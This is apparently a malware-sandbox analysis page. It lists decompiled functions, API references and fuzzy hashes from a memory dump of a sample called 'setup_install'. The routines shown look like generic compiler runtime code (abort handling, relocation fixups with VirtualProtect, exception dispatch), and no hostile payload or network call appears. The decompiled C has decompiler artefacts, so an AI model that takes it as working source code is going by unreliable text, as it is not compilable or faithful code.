abort.MSVCRT(?,?,20247C8B,?,0041C520,474E5543,0040FB3E), ref: 00498CB5

Memory Dump Source

Source File: 00000007.00000002.304000935.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.303997911.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304077955.000000000049F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304082819.00000000004A1000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304091149.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304129679.00000000004E6000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304134557.00000000004EA000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304152406.000000000050D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304163755.000000000051B000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_setup_install.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: a275843bda4077352c89f2df2deeb6e58579fb89da32f93cd15de52a169c75b9
Instruction ID: 296fa3987acfdbfba9caef191b2246664289245bfc8e29cfb94c56dc6c098e32
Opcode Fuzzy Hash: a275843bda4077352c89f2df2deeb6e58579fb89da32f93cd15de52a169c75b9
Instruction Fuzzy Hash: 97216D727052119FCB10CF59D8817A5B3A6FBC2318F1D817FE9489B752C339A80A87A8

Uniqueness

Uniqueness Score: -1.00%

Function 00410ACC, Relevance: 3.0, APIs: 2, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00410ACC(void* __eax) {
				intOrPtr _v24;
				intOrPtr* _t4;

				_v24 = 0;
				 *_t4 = 0x4e650c;
				L0041B760();
				_v24 = E00410A90;
				 *_t4 = 0x4e6508;
				L0041B770();
				if (__eax != 0) goto 0x498cb0;
				return __eax;
			}

0x00410ad3
0x00410adb
0x00410ae2
0x00410ae7
0x00410aef
0x00410af6
0x00410afd
0x00410b06

APIs

abort.MSVCRT(?,?,20247C8B,?,0041C520,474E5543,0040FB3E), ref: 00498CB0
abort.MSVCRT(?,?,20247C8B,?,0041C520,474E5543,0040FB3E), ref: 00498CB5

Memory Dump Source

Source File: 00000007.00000002.304000935.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.303997911.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304077955.000000000049F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304082819.00000000004A1000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304091149.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304129679.00000000004E6000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304134557.00000000004EA000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304152406.000000000050D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304163755.000000000051B000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_setup_install.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 0bb73f9c863cb10dc0cdca9c1391057688f687ab12ed9e99395f5e92623d6f74
Instruction ID: e8e47dab4c7d535c9ab6dca0ac351a6d1c18197fb4bd90dc2fcb6d80a01d6e27
Opcode Fuzzy Hash: 0bb73f9c863cb10dc0cdca9c1391057688f687ab12ed9e99395f5e92623d6f74
Instruction Fuzzy Hash: E5E0ECB4905204AAC6007F6A810627AB6F0AF9178CF81981FE49417152E7BC84848BDF

Uniqueness

Uniqueness Score: -1.00%

Function 00420400, Relevance: 1.6, APIs: 1, Instructions: 315COMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 0042042C

Memory Dump Source

Source File: 00000007.00000002.304000935.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.303997911.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304077955.000000000049F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304082819.00000000004A1000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304091149.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304129679.00000000004E6000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304134557.00000000004EA000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304152406.000000000050D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304163755.000000000051B000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_setup_install.jbxd

Similarity

API ID: wcslen
String ID:
API String ID: 4088430540-0
Opcode ID: 5a249b15d2a00f112db9dcf7dceff725d22efb6f2bc5f310efcf04c205470fbd
Instruction ID: 3f89951bbf3c0353d88fc30b37baf109e30e630df02fa3141e6e41a565efa7d3
Opcode Fuzzy Hash: 5a249b15d2a00f112db9dcf7dceff725d22efb6f2bc5f310efcf04c205470fbd
Instruction Fuzzy Hash: 4791BE72B042218BC314DE69E4C085BF7E6EBE9314F54892EE98887311E376DC95CB96

Uniqueness

Uniqueness Score: -1.00%

Function 004615E0, Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.304000935.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.303997911.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304077955.000000000049F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304082819.00000000004A1000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304091149.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304129679.00000000004E6000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304134557.00000000004EA000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304152406.000000000050D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304163755.000000000051B000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_setup_install.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a7b95aad294a8d3b4da59e188f0e0f4e34eaf19988c486f993cd19b8b810496
Instruction ID: 23032a76328612de019450130a4b4203ac3227b72b9d635180a08fcfffd09857
Opcode Fuzzy Hash: 5a7b95aad294a8d3b4da59e188f0e0f4e34eaf19988c486f993cd19b8b810496
Instruction Fuzzy Hash: 3F3129B5A093019FC304AF29C89461BFBE1FBD9354F18D92EE8C887311D278D8859B96

Uniqueness

Uniqueness Score: -1.00%

Function 004917E0, Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.304000935.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.303997911.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304077955.000000000049F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304082819.00000000004A1000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304091149.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304129679.00000000004E6000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304134557.00000000004EA000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304152406.000000000050D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304163755.000000000051B000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_setup_install.jbxd

Similarity

API ID: mallocstrerrorstrlen
String ID:
API String ID: 993191051-0
Opcode ID: 69db063388f05743d6a22e81b3f9988b1577d79c3a1559f3c3a117bee9d4b84f
Instruction ID: 5879f870a116fb5e739391e59ae2478a686bda35cb7303ec61bd916b96b09d42
Opcode Fuzzy Hash: 69db063388f05743d6a22e81b3f9988b1577d79c3a1559f3c3a117bee9d4b84f
Instruction Fuzzy Hash: 931119B18183159BCF00BFAAC48546EBEF4AE81348F46893FE4C557211EB7C94848B9A

Uniqueness

Uniqueness Score: -1.00%

Function 0042A760, Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.304000935.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.303997911.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304077955.000000000049F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304082819.00000000004A1000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304091149.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304129679.00000000004E6000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304134557.00000000004EA000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304152406.000000000050D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304163755.000000000051B000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_setup_install.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb827a43f8aa5cf082a60cf9c75296aa8679c7afa8b087a431580ecc4804176d
Instruction ID: 49bb667e30c5cfc7f8f664c8644fa4138f336ca6b08e16ab9d69e337b5f0c6d0
Opcode Fuzzy Hash: eb827a43f8aa5cf082a60cf9c75296aa8679c7afa8b087a431580ecc4804176d
Instruction Fuzzy Hash: 1D017C70A082109FC704EF2DC18041AFBE5FBD9308F50896EE48897315DB75D945CB8A

Uniqueness

Uniqueness Score: -1.00%

Function 00425DB3, Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.304000935.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.303997911.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304077955.000000000049F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304082819.00000000004A1000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304091149.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304129679.00000000004E6000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304134557.00000000004EA000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304152406.000000000050D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304163755.000000000051B000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_setup_install.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c69fd4d3ecf1582bf685e8a986f0d93ab68b84be7f8f3f5d24745958161b9507
Instruction ID: fb635c1175ddbe5ac56cfc69f9f7d78be716d3772bfeecd71b26a62a050faca4
Opcode Fuzzy Hash: c69fd4d3ecf1582bf685e8a986f0d93ab68b84be7f8f3f5d24745958161b9507
Instruction Fuzzy Hash: 9A0104B08186158ACB00BF69808146EBEF0AE91348F46983FE0C567216EB7C94848B9A

Uniqueness

Uniqueness Score: -1.00%

Function 00420CB0, Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.304000935.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.303997911.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304077955.000000000049F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304082819.00000000004A1000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304091149.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304129679.00000000004E6000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304134557.00000000004EA000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304152406.000000000050D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304163755.000000000051B000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_setup_install.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 368066b697fe1d95d8d005b82565533d3e806b2e9d1134bab4ad3c792d92a3ea
Instruction ID: b5ee2f966efa4660969602d01897a734dd8c0ffe6fcc58f693bf69b162ca9b51
Opcode Fuzzy Hash: 368066b697fe1d95d8d005b82565533d3e806b2e9d1134bab4ad3c792d92a3ea
Instruction Fuzzy Hash: 1EE0ECB5E096008FCB04EF18C58582AF7F1BF96304F54EAADE08497321D339E410CA5E

Uniqueness

Uniqueness Score: -1.00%

Function 0041C892, Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.304000935.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.303997911.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304077955.000000000049F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304082819.00000000004A1000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304091149.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304129679.00000000004E6000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304134557.00000000004EA000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304152406.000000000050D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304163755.000000000051B000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_setup_install.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1399eca256eebb468d70b3c42d808a8720b8bc0a42df8d84b31f5332cd3a024b
Instruction ID: 2aaa3f9e01355abff18861f4590f5ab694ad9cbf2fa27ba5d53c4f404f5e8449
Opcode Fuzzy Hash: 1399eca256eebb468d70b3c42d808a8720b8bc0a42df8d84b31f5332cd3a024b
Instruction Fuzzy Hash: D3C02BA3C4090107C2003D34044B2BCB730C262120FC975BDC41117B13E02EC03580CF

Uniqueness

Uniqueness Score: -1.00%

Function 0041C6D0, Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.304000935.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.303997911.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304077955.000000000049F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304082819.00000000004A1000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304091149.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304129679.00000000004E6000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304134557.00000000004EA000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304152406.000000000050D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304163755.000000000051B000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_setup_install.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd7515b8008d3b8a6004f4c245d8cd3bd475056c1a2193a35c886f7e95cb85bc
Instruction ID: ee7c07fb7b96aa30a4c8963faa4a3b817b45f3de06e4907e099fc16ce3e186f4
Opcode Fuzzy Hash: cd7515b8008d3b8a6004f4c245d8cd3bd475056c1a2193a35c886f7e95cb85bc
Instruction Fuzzy Hash: 60C012B0C096408ACA00BF38820A228BEB06F82208F8469BCE48013252E679C428869F

Uniqueness

Uniqueness Score: -1.00%

Function 0041E670, Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 141fileCOMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 0041E6E1
fwrite.MSVCRT ref: 0041E788
fputs.MSVCRT ref: 0041E7A5
fwrite.MSVCRT ref: 0041E7CE
fputs.MSVCRT ref: 0041E7ED
fwrite.MSVCRT ref: 0041E81C
fwrite.MSVCRT ref: 0041E84E
abort.MSVCRT ref: 0041E853
abort.MSVCRT ref: 0049738B
??3@YAXPAX@Z.MSVCRT ref: 00497393

Part of subcall function 0040BE80: strlen.MSVCRT ref: 0040BF05
Part of subcall function 0040BE80: memcpy.MSVCRT ref: 0040BF20
Part of subcall function 0040BE80: ??3@YAXPAX@Z.MSVCRT ref: 0040BF2A

Strings

not enough space for format expansion (Please submit full bug report at https://gcc.gnu.org/bugs/): , xrefs: 0041E689
-, xrefs: 0041E801

Memory Dump Source

Source File: 00000007.00000002.304000935.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.303997911.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304077955.000000000049F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304082819.00000000004A1000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304091149.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304129679.00000000004E6000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304134557.00000000004EA000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304152406.000000000050D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304163755.000000000051B000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_setup_install.jbxd

Similarity

API ID: fwrite$??3@abortfputsmemcpy$strlen
String ID: -$not enough space for format expansion (Please submit full bug report at https://gcc.gnu.org/bugs/):
API String ID: 726637178-2342464244
Opcode ID: d89ae5ac313149aa8ef8ec214e64b77c49b4ce27f922d1ed9d82d42b83274b31
Instruction ID: 234c00ca2ea761544febf602a3223a0029e86ecf9e67fbcd0ccb98d817d2554c
Opcode Fuzzy Hash: d89ae5ac313149aa8ef8ec214e64b77c49b4ce27f922d1ed9d82d42b83274b31
Instruction Fuzzy Hash: 25514BB08083059FDB10AF65C48579EBFE5BF85348F01892EE89887392D77C8484DF9A

Uniqueness

Uniqueness Score: -1.00%

Function 0040C570, Relevance: 13.8, APIs: 9, Instructions: 259
memoryCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E0040C570(long __eax, void* __edi, void* __esi) {
				void* _v16;
				char _v32;
				void* _v45;
				long _v48;
				signed int _v52;
				signed int _v56;
				void* _v60;
				void* _v64;
				void* _v68;
				signed int _v72;
				signed int _v100;
				long _t60;
				void* _t65;
				int _t75;
				long _t78;
				signed int _t80;
				intOrPtr _t84;
				signed int _t95;
				long _t97;
				signed int _t98;
				long** _t100;
				signed int _t102;
				long _t105;
				long _t110;
				signed int _t111;
				signed int _t113;
				long _t117;
				long _t118;
				signed int _t120;
				long _t121;
				void* _t123;
				intOrPtr _t127;
				DWORD* _t128;
				signed char* _t130;
				long _t133;
				intOrPtr _t135;
				long _t136;
				intOrPtr* _t139;
				void* _t144;
				void* _t145;
				intOrPtr* _t146;
				intOrPtr* _t149;

				_t60 = __eax;
				_push(__edi);
				_push(__esi);
				_t145 = _t144 - 0x3c;
				_t95 =  *0x4e649c; // 0x1
				if(_t95 == 0) {
					 *0x4e649c = 1;
					_t65 = L0040CF70(0x0000001e + (E0040CD80() + _t61 * 0x00000004) * 0x00000004 & 0xfffffff0);
					 *0x4e64a0 = 0;
					_t146 = _t145 - _t65;
					 *0x4e64a4 =  &_v45 & 0xfffffff0;
					_t60 = 0;
					__eflags = 0x4ab040 - 7;
					if(0x4ab040 <= 7) {
						goto L1;
					} else {
						__eflags = 0x4ab040 - 0xb;
						_t117 =  *0x4ab040;
						if(0x4ab040 <= 0xb) {
							_t110 = 0x4ab040;
							goto L18;
						} else {
							__eflags = _t117;
							if(_t117 == 0) {
								L27:
								__eflags =  *0x4ab044;
								if( *0x4ab044 != 0) {
									goto L5;
								} else {
									__eflags =  *0x4ab048;
									if( *0x4ab048 != 0) {
										_t110 = 0x4ab040;
										goto L20;
									} else {
										_t117 =  *0x4ab04c;
										_t110 = 0x4ab04c;
										L18:
										__eflags = _t117;
										if(_t117 != 0) {
											goto L6;
										} else {
											_t60 =  *(_t110 + 4);
											__eflags = _t60;
											if(_t60 != 0) {
												goto L6;
											} else {
												L20:
												_t60 =  *(_t110 + 8);
												__eflags = _t60 - 1;
												if(_t60 != 1) {
													_v72 = _t60;
													 *_t146 = 0x4a4a7c;
													0x498c10();
													_push(_t95);
													_t149 = _t146 - 0x18;
													_t100 = _v72;
													_t78 =  *( *_t100);
													__eflags = _t78 - 0xc0000091;
													if(_t78 > 0xc0000091) {
														__eflags = _t78 - 0xc0000094;
														if(_t78 == 0xc0000094) {
															_v100 = 0;
															 *_t149 = 8;
															L0041B470();
															__eflags = _t78 - 1;
															if(_t78 != 1) {
																goto L46;
															} else {
																_v100 = 1;
																 *_t149 = 8;
																L0041B470();
																_t80 = 0xffffffff;
															}
														} else {
															__eflags = _t78 - 0xc0000096;
															if(_t78 == 0xc0000096) {
																goto L52;
															} else {
																__eflags = _t78 - 0xc0000093;
																if(_t78 != 0xc0000093) {
																	goto L47;
																} else {
																	goto L45;
																}
															}
														}
													} else {
														__eflags = _t78 - 0xc000008d;
														if(_t78 >= 0xc000008d) {
															L45:
															_v100 = 0;
															 *_t149 = 8;
															L0041B470();
															__eflags = _t78 - 1;
															if(_t78 == 1) {
																_v100 = 1;
																 *_t149 = 8;
																L0041B470();
																E0040C3F0(_t78);
																_t80 = 0xffffffff;
															} else {
																L46:
																__eflags = _t78;
																if(_t78 != 0) {
																	 *_t149 = 8;
																	 *_t78();
																	_t80 = 0xffffffff;
																} else {
																	goto L47;
																}
															}
														} else {
															__eflags = _t78 - 0xc0000005;
															if(_t78 != 0xc0000005) {
																__eflags = _t78 - 0xc000001d;
																if(_t78 != 0xc000001d) {
																	goto L47;
																} else {
																	L52:
																	_v100 = 0;
																	 *_t149 = 4;
																	L0041B470();
																	__eflags = _t78 - 1;
																	if(_t78 == 1) {
																		_v100 = 1;
																		 *_t149 = 4;
																		L0041B470();
																		_t80 = _t78 | 0xffffffff;
																	} else {
																		__eflags = _t78;
																		if(_t78 == 0) {
																			goto L47;
																		} else {
																			 *_t149 = 4;
																			 *_t78();
																			_t80 = 0xffffffff;
																		}
																	}
																}
															} else {
																_v100 = 0;
																 *_t149 = 0xb;
																L0041B470();
																__eflags = _t78 - 1;
																if(_t78 == 1) {
																	_v100 = 1;
																	 *_t149 = 0xb;
																	L0041B470();
																	_t80 = _t78 | 0xffffffff;
																} else {
																	__eflags = _t78;
																	if(_t78 == 0) {
																		L47:
																		_t78 =  *0x4e64ac; // 0x0
																		__eflags = _t78;
																		if(_t78 != 0) {
																			_v72 = _t100;
																			_t149 = _t149 + 0x18;
																			_pop(_t100);
																			goto __eax;
																		}
																		_t80 = 0;
																	} else {
																		 *_t149 = 0xb;
																		 *_t78();
																		_t80 = 0xffffffff;
																	}
																}
															}
														}
													}
													return _t80;
												} else {
													_t32 = _t110 + 0xc; // 0x4ab04c
													_t139 = _t32;
													__eflags = _t139 - 0x4ab040;
													if(_t139 >= 0x4ab040) {
														goto L1;
													} else {
														_v56 = _t95;
														do {
															_t84 =  *_t139;
															_t95 =  *(_t139 + 8) & 0x000000ff;
															_t111 =  *((intOrPtr*)(_t139 + 4));
															_t123 = _t84 + 0x400000;
															_t60 =  *(_t84 + 0x400000);
															__eflags = _t95 - 0x10;
															_t130 = _t111 + 0x400000;
															_v48 = _t60;
															if(_t95 == 0x10) {
																_t102 =  *(_t111 + 0x400000) & 0x0000ffff;
																_v52 = _t111;
																__eflags =  *(_t111 + 0x400000);
																_t103 =  <  ? _t102 | 0xffff0000 : _t102;
																_t104 = ( <  ? _t102 | 0xffff0000 : _t102) - _t123;
																_t105 = ( <  ? _t102 | 0xffff0000 : _t102) - _t123 + _v48;
																__eflags = _t105;
																_t60 = E0040C420(_t130, _t130, _t139);
																 *(_v52 + 0x400000) = _t105;
																goto L31;
															} else {
																__eflags = _t95 - 0x20;
																if(_t95 == 0x20) {
																	_t60 = E0040C420(_t130, _t130, _t139);
																	 *_t130 = _v48 - _t123 +  *_t130;
																	goto L31;
																} else {
																	__eflags = _t95 - 8;
																	if(_t95 == 8) {
																		_t113 =  *_t130 & 0x000000ff;
																		__eflags =  *_t130;
																		_t114 =  <  ? _t113 | 0xffffff00 : _t113;
																		_t115 = ( <  ? _t113 | 0xffffff00 : _t113) - _t123;
																		_t92 = _t60 + ( <  ? _t113 | 0xffffff00 : _t113) - _t123;
																		_t109 = _t60 + ( <  ? _t113 | 0xffffff00 : _t113) - _t123;
																		_t60 = E0040C420(_t130, _t130, _t139);
																		 *_t130 = _t60 + ( <  ? _t113 | 0xffffff00 : _t113) - _t123;
																		goto L31;
																	} else {
																		_v72 = _t95;
																		 *_t146 = 0x4a4ab0;
																		0x498c10();
																		goto L27;
																	}
																}
															}
															goto L61;
															L31:
															_t139 = _t139 + 0xc;
															__eflags = _t139 - 0x4ab040;
														} while (_t139 < 0x4ab040);
														_t98 = _v56;
														goto L11;
													}
												}
											}
										}
									}
								}
							} else {
								L5:
								_t110 = 0x4ab040;
								L6:
								__eflags = _t110 - 0x4ab040;
								if(_t110 >= 0x4ab040) {
									goto L1;
								} else {
									_t7 = _t110 + 8; // 0x4ab048
									_t133 = _t7;
									_v52 = _t95;
									_t118 = _t110;
									_t97 = _t133;
									_t10 = (0x4ab047 - _t133 >> 3) * 8; // 0x4ab048
									_v48 = _t110 + _t10 + 8;
									while(1) {
										_t127 =  *((intOrPtr*)(_t118 + 4));
										_t135 =  *((intOrPtr*)(_t127 + 0x400000)) +  *_t118;
										_t60 = E0040C420(_t127 + 0x400000, _t127, _t135);
										__eflags = _t97 - _v48;
										 *((intOrPtr*)(_t127 + 0x400000)) = _t135;
										_t118 = _t97;
										if(_t97 == _v48) {
											break;
										}
										_t97 = _t97 + 8;
										__eflags = _t97;
									}
									_t98 = _v52;
									L11:
									_t136 =  *0x4e64a0; // 0x0
									__eflags = _t136;
									if(_t136 <= 0) {
										goto L1;
									} else {
										_t128 =  &_v32;
										do {
											_t120 =  *0x4e64a4; // 0x71fd30
											_t75 = _t120 + (_t98 + _t98 * 4) * 4;
											_t121 =  *_t75;
											__eflags = _t121;
											if(_t121 != 0) {
												_t75 = VirtualProtect( *(_t75 + 4),  *(_t75 + 8), _t121, _t128);
												_t146 = _t146 - 0x10;
											}
											_t98 = _t98 + 1;
											__eflags = _t98 -  *0x4e64a0; // 0x0
										} while (__eflags < 0);
										return _t75;
									}
								}
							}
						}
					}
				} else {
					L1:
					return _t60;
				}
				L61:
			}

0x0040c570
0x0040c573
0x0040c574
0x0040c576
0x0040c579
0x0040c581
0x0040c590
0x0040c5ac
0x0040c5b1
0x0040c5bb
0x0040c5c4
0x0040c5ce
0x0040c5d3
0x0040c5d6
0x00000000
0x0040c5d8
0x0040c5d8
0x0040c5db
0x0040c5e1
0x0040c6a1
0x00000000
0x0040c5e7
0x0040c5e7
0x0040c5e9
0x0040c725
0x0040c72b
0x0040c72d
0x00000000
0x0040c733
0x0040c739
0x0040c73b
0x0040c7d6
0x00000000
0x0040c741
0x0040c741
0x0040c747
0x0040c6a6
0x0040c6a6
0x0040c6a8
0x00000000
0x0040c6ae
0x0040c6ae
0x0040c6b1
0x0040c6b3
0x00000000
0x0040c6b9
0x0040c6b9
0x0040c6b9
0x0040c6bc
0x0040c6bf
0x0040c7e0
0x0040c7e4
0x0040c7eb
0x0040c7f0
0x0040c7f1
0x0040c7f4
0x0040c7fa
0x0040c7fc
0x0040c801
0x0040c850
0x0040c855
0x0040c8a1
0x0040c8a9
0x0040c8b0
0x0040c8b5
0x0040c8b8
0x00000000
0x0040c8ba
0x0040c8ba
0x0040c8c2
0x0040c8c9
0x0040c8ce
0x0040c8ce
0x0040c857
0x0040c857
0x0040c85c
0x00000000
0x0040c85e
0x0040c85e
0x0040c863
0x00000000
0x00000000
0x00000000
0x00000000
0x0040c863
0x0040c85c
0x0040c803
0x0040c803
0x0040c808
0x0040c865
0x0040c865
0x0040c86d
0x0040c874
0x0040c879
0x0040c87c
0x0040c925
0x0040c92d
0x0040c934
0x0040c939
0x0040c93e
0x0040c882
0x0040c882
0x0040c882
0x0040c884
0x0040c910
0x0040c917
0x0040c919
0x00000000
0x00000000
0x00000000
0x0040c884
0x0040c80a
0x0040c80a
0x0040c80f
0x0040c8d5
0x0040c8da
0x00000000
0x0040c8dc
0x0040c8dc
0x0040c8dc
0x0040c8e4
0x0040c8eb
0x0040c8f0
0x0040c8f3
0x0040c945
0x0040c94d
0x0040c954
0x0040c959
0x0040c8f5
0x0040c8f5
0x0040c8f7
0x00000000
0x0040c8f9
0x0040c8f9
0x0040c900
0x0040c902
0x0040c902
0x0040c8f7
0x0040c8f3
0x0040c815
0x0040c815
0x0040c81d
0x0040c824
0x0040c829
0x0040c82c
0x0040c95e
0x0040c966
0x0040c96d
0x0040c972
0x0040c832
0x0040c832
0x0040c834
0x0040c88a
0x0040c88a
0x0040c88f
0x0040c891
0x0040c897
0x0040c89b
0x0040c89e
0x0040c89f
0x0040c89f
0x0040c980
0x0040c836
0x0040c836
0x0040c83d
0x0040c83f
0x0040c83f
0x0040c834
0x0040c82c
0x0040c80f
0x0040c808
0x0040c922
0x0040c6c5
0x0040c6c5
0x0040c6c5
0x0040c6c8
0x0040c6ce
0x00000000
0x0040c6d4
0x0040c6d4
0x0040c6e0
0x0040c6e0
0x0040c6e2
0x0040c6e6
0x0040c6e9
0x0040c6ef
0x0040c6f5
0x0040c6f8
0x0040c6fe
0x0040c701
0x0040c751
0x0040c758
0x0040c762
0x0040c76a
0x0040c76f
0x0040c771
0x0040c771
0x0040c774
0x0040c77c
0x00000000
0x0040c703
0x0040c703
0x0040c706
0x0040c7cd
0x0040c7d2
0x00000000
0x0040c70c
0x0040c70c
0x0040c70f
0x0040c7a0
0x0040c7ab
0x0040c7ae
0x0040c7b1
0x0040c7b3
0x0040c7b5
0x0040c7b9
0x0040c7be
0x00000000
0x0040c715
0x0040c715
